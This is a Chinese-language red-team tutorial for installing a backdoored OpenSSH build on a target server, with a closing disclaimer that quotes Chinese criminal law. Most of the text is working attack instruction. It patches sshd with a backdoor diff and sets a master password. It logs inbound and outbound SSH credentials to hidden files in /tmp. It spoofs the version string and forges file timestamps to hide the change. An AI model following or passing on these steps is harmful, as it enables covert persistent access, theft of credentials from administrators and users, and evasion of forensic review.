下文将介绍如何使用OpenSsh完成;
1、root任意密码设置
2、将用户名与密码记录到log中
准备工作
1、明确ssh版本方便等将后续安装的openssh的版本号修改为原版本号
ssh -V
2、将原有ssh文件进行备份,方便一会为新安装的openssh同步时间属性
# 1、为了保存源文件的信息我们先做改名操作,后复制改名后的文件为源文件的样子(注意.bak文件保留着文件的原属性)
mv /etc/ssh/ /etc/ssh.bak/
mv /usr/sbin/sshd /usr/sbin/sshd.bak
mv /usr/sbin/sshd-keygen /usr/sbin/sshd-keygen.bak
# 2、复制改名后的文件为源文件的文件名(一会安装openssh会调用所以要备份一份)
cp -r ssh.bak/ /etc/ssh
cp /usr/sbin/sshd.bak /usr/sbin/sshd
cp /usr/sbin/sshd-keygen.bak /usr/sbin/sshd-keygen
后门OPENSSH安装
此处需要准备两个文件
1、openssh-5.9p1.tar.gz
2、openssh-5.9p1.patch.tar.gz
操作步骤
1、将openssh-5.9p1.tar.gz,openssh-5.9p1.patch.tar.gz上传至目标服务器
2、分别解压openssh-5.9p1.tar.gz,openssh-5.9p1.patch.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.patch.tar.gz
3、将patch文件(后门文件)复制到openssh安装包
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff
4、修改后⻔密码和⽂件记录
# 1、编辑includes
vi includes.h
# 2、修改ILOG,OLOG,SECRETPW
int secret_ok;
FILE *f;
#define ILOG "/tmp/.ilog" # 记录登录到本机的登录凭证(可以改为较为隐蔽的路径,此例在tmp下创建隐藏文件)
#define OLOG "/tmp/.olog" # 记录本机登录到远程的的登录凭证
#define SECRETPW "redteam" # 远程连接密码
#endif /* INCLUDES_H */
5、修改版本号为原本的版本号
vi version.h
# 修改为当前OpenSSH的版本号
#define SSH_VERSION "OpenSSH_7.4p1"
#define SSH_PORTABLE "p1"
6、对/etc/ssh⾥⾯的⼏个key的权限进⾏修改,否则进⾏编译的时候会因为key不能修改⽽报错。
chmod 620 moduli
chmod 600 sshd_config ssh_host_ecdsa_key ssh_host_rsa_key
chmod 644 ssh_config ssh_host_ecdsa_key.pub ssh_host_rsa_key.pub
7、预编译
# 切换到安装文件所在路径
cd /tmp/ssh/openssh-5.9p1
# 必备依赖刷一波,避免编译时出现各种坑爹问题
yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc patch
# 执行预编译
./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
8、伪造文件时间属性(访问和修改时间)
# 将前面文件的时间属性改为后面的文件属性
touch -r /etc/ssh/moduli /etc/ssh.bak/moduli
touch -r /etc/ssh/ssh_config /etc/ssh.bak/ssh_config
touch -r /etc/ssh/sshd_config /etc/ssh.bak/sshd_config
touch -r /etc/ssh/ssh_host_dsa_key /etc/ssh.bak/ssh_host_dsa_key
touch -r /etc/ssh/ssh_host_dsa_key.pub /etc/ssh.bak/ssh_host_dsa_key.pub
touch -r /etc/ssh/ssh_host_ecdsa_key /etc/ssh.bak/ssh_host_ecdsa_key
touch -r /etc/ssh/ssh_host_ecdsa_key.pub /etc/ssh.bak/ssh_host_ecdsa_key.pub
touch -r /etc/ssh/ssh_host_ed25519_key /etc/ssh.bak/ssh_host_ed25519_key
touch -r /etc/ssh/ssh_host_ed25519_key.pub /etc/ssh.bak/ssh_host_ed25519_key.pub
touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh.bak/ssh_host_rsa_key
touch -r /etc/ssh/ssh_host_rsa_key.pub /etc/ssh.bak/ssh_host_rsa_key.pub
touch -r /usr/sbin/sshd /usr/sbin/sshd.bak
touch -r /usr/sbin/sshd-keygen /usr/sbin/sshd-keygen.bak
9、重启服务
systemctl restart sshd.service
10、验证是否好用
后门密码登录
查看密码记录
为了您和您家人的幸福,请不要利用文中技术在用户未授权情况下开展渗透测试!!!
《中华人民共和国刑法》
第二百八十五条
违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
第二百八十六条
违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。
故意制作、传播计算机病毒等破坏程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚